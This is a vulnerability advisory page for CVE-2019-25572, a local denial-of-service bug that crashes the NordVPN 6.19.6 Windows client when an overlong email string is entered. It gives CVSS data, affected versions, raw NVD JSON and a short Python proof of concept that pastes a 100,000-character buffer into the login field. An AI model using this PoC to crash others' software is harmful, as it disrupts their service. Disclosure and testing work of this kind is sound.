Security Vulnerability Report
CVE-2019-25572 CVSS 6.2 MEDIUM

CVE-2019-25572

Published: 2026-03-21 13:16:21
Last Modified: 2026-04-15 17:12:40

Description

NordVPN 6.19.6 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the email input field. Attackers can paste a buffer of 100,000 characters into the email field during login to trigger an application crash.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nordvpn:nordvpn:*:*:*:*:*:windows:*:* - VULNERABLE
NordVPN 6.19.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import pyautogui
import pyperclip
import time

# Generate the payload: a buffer of 100,000 characters
# This mimics the exploit described in the vulnerability report
payload = "A" * 100000


def exploit_nordvpn_dos():
    print("[+] Copying payload to clipboard...")
    pyperclip.copy(payload)

    print("[!] WARNING: This will crash the NordVPN application.")
    print("[+] Please switch to the NordVPN login window within 5 seconds...")
    time.sleep(5)

    # Simulate the user interaction to paste the payload into the email field
    # Assuming the cursor is focused on the email input field
    print("[+] Pasting payload into the email field...")
    pyautogui.hotkey('ctrl', 'v')

    print("[+] Payload delivered. Application should crash shortly.")


if __name__ == "__main__":
    exploit_nordvpn_dos()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25572", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:21.200", "lastModified": "2026-04-15T17:12:40.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NordVPN 6.19.6 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the email input field. Attackers can paste a buffer of 100,000 characters into the email field during login to trigger an application crash."}, {"lang": "es", "value": "NordVPN 6.19.6 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales provocar un fallo en la aplicación al enviar una cadena excesivamente larga en el campo de entrada de correo electrónico. Los atacantes pueden pegar un búfer de 100.000 caracteres en el campo de correo electrónico durante el inicio de sesión para provocar un fallo en la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1260"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nordvpn:nordvpn:*:*:*:*:*:windows:*:*", "versionEndIncluding": "6.19.6", "matchCriteriaId": "C912F120-836D-4BC2-B181-D241D636412A"}]}]}], "references": [{"url": "https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe", "source": "[email protected]", "tags": 
["Broken Link"]}, {"url": "https://nordvpn.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46343", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/nordvpn-denial-of-service-via-email-field-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}